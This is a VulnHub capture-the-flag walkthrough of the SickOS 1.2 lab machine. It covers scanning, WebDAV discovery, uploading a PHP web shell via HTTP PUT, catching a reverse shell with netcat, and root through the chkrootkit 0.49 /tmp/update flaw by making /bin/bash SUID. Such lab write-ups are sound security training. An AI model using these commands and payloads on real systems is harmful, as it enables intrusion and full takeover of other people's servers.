Home SickOS 1.2
Post
Cancel

SickOS 1.2

Posted Jan 30, 2024
By KS
5 min read

Machine Information

Host discovery

  • target IP: 192.168.188.167

Information Gathering

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

nmap -p- -T4 192.168.188.167 -A -oA 192.168.188.167
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-30 14:30 +08
Nmap scan report for 192.168.188.167
Host is up (0.00056s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA)
|   2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)
|_  256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)
80/tcp open  http    lighttpd 1.4.28
|_http-server-header: lighttpd/1.4.28
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:1F:F5:5E (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (93%), Linux 3.16 - 4.6 (93%), Linux 3.2 - 4.9 (93%), Linux 4.4 (93%), Linux 3.13 (90%), Linux 3.18 (89%), Linux 4.2 (89%), Linux 3.13 - 3.16 (87%), Linux 3.16 (87%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.56 ms 192.168.188.167

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 106.75 seconds

Since only port 22 and 80, this should be focusing on port 80 most of the time.

Exploiting Port 80

After looking around the website, there are no useful information that I could abuse or take note. So I decided to brute force the directory first.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://192.168.188.167/ -x php,html,js,css,txt,bak 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.188.167/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,js,css,txt,bak
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 163]
/test                 (Status: 301) [Size: 0] [--> http://192.168.188.167/test/]
/%7echeckout%7e       (Status: 403) [Size: 345]
Progress: 1453501 / 1453508 (100.00%)
===============================================================
Finished
===============================================================

The result of directory bruteforcing is also not useful as there’s nothing that I could make use of. Since I do not have any idea, I tried to look for everything again and found someting useful.

1
2
3
4
5
6
7
8
9

curl -IX OPTIONS http://192.168.188.167/test 
HTTP/1.1 301 Moved Permanently
DAV: 1,2
MS-Author-Via: DAV
Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
Location: http://192.168.188.167/test/
Content-Length: 0
Date: Tue, 30 Jan 2024 06:47:39 GMT
Server: lighttpd/1.4.28

Although the test directory is useless, the HTTP OPTIONS allowed in the directory has alot of useful OPTIONS such as PUT and COPY. PUT method in the web server allow me to just upload any files. To use the PUT method, I use curl command to upload the file.

1
2
3
4
5

curl -X PUT http://192.168.188.167/test/wee.php -d '<?php system($_GET[0]); ?>'

curl 'http://192.168.188.167/test/wee.php?0=id'              
uid=33(www-data) gid=33(www-data) groups=33(www-data)

With that, I managed to upload a PHP file just by abusing PUT method. I then spawn a reverse shell from there and continue with privilege escalation.

1
2
3
4
5

nc -nvlp 443 
listening on [any] 443 ...
connect to [192.168.188.128] from (UNKNOWN) [192.168.188.167] 36704
bash: no job control in this shell
www-data@ubuntu:/var/www/test$

The reverse shell is weird as it only spawn if the port is 443. Lets stabilize the shell before moving on.

Privilege Escalation

I started out by searching for useful information as well as using linpeas.sh

1
2
3

www-data@ubuntu:/etc/cron.daily$ ls
apt       bsdmainutils  dpkg      logrotate  mlocate  popularity-contest
aptitude  chkrootkit    lighttpd  man-db     passwd   standard

After searching for awhile, I noticed chrootkit which have a local privilege escalation exploit. I then tried to check if the version is same or not.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

www-data@ubuntu:/etc/cron.daily$ find / -name *chkrootkit* 2>/dev/null
/usr/sbin/chkrootkit
/etc/cron.daily/chkrootkit
www-data@ubuntu:/etc/cron.daily$ head /usr/sbin/chkrootkit
#! /bin/sh
# -*- Shell-script -*-

# $Id: chkrootkit, v 0.49 2009/07/30
CHKROOTKIT_VERSION='0.49'

# Authors: Nelson Murilo <nelson@pangeia.com.br> (main author) and
#          Klaus Steding-Jessen <jessen@cert.br>
#
# (c)1997-2009 Nelson Murilo, Pangeia Informatica, AMS Foundation and others.
www-data@ubuntu:/etc/cron.daily$

With that, I have confirmed that the version is exactly the same. Now that it is same, I could just use the exploit and get root. Based on the exploit, It will execute /tmp/update as root because of the function slapper().

1
2
3
4

www-data@ubuntu:/tmp$ echo "chmod u+s /bin/bash" > update
www-data@ubuntu:/tmp$ chmod 755 update
www-data@ubuntu:/tmp$ ls -la /bin/bash
-rwsr-xr-x 1 root root 920788 Mar 28  2013 /bin/bash

Now that the /bin/bash has SUID binaries, I could just get root access with that.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

www-data@ubuntu:/tmp$ /bin/bash -p
/bin/bash -p
whoami
root
cd /root
ls
304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gz
7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
chkrootkit-0.49
newRule
cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
WoW! If you are viewing this, You have "Sucessfully!!" completed SickOs1.2, the challenge is more focused on elimination of tool in real scenarios where tools can be blocked during an assesment and thereby fooling tester(s), gathering more information about the target using different methods, though while developing many of the tools were limited/completely blocked, to get a feel of Old School and testing it manually.

Thanks for giving this try.

@vulnhub: Thanks for hosting this UP!.

Things I learned from the machine

  • Upload file with PUT method is OP
  • privilege escalation with cronjob but using chkrootkit
Vulnhub
boot2root
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents

Stapler 1

pWnOS 2.0